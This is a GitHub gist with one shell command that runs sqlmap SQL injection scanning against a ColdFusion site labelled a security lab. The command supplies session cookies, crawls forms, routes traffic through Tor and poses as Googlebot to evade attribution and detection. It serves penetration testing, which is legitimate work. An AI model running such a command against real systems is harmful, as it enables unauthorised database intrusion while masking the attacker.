Skip to content

Instantly share code, notes, and snippets.

@cmaggiulli
Created July 22, 2018 21:47
Show Gist options
  • Save cmaggiulli/2a9af2ead75b2cf22c4c73236270eb4c to your computer and use it in GitHub Desktop.
Save cmaggiulli/2a9af2ead75b2cf22c4c73236270eb4c to your computer and use it in GitHub Desktop.
Example sqlmap statement using tor and sending coldfusion CFID and CFTOKEN cookies
#!/bin/sh
./sqlmap.py -u "http://www.my-security-lab-example.com/index.cfm" --cookie="CFID=14438602; CFTOKEN=c0d7ea59ab207174-42572088-1DD8-B747-629578C7057DE711" --level=3 --risk=1 --tor --tor-type=SOCKS5 --check-tor --tor-port=9050 --forms --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment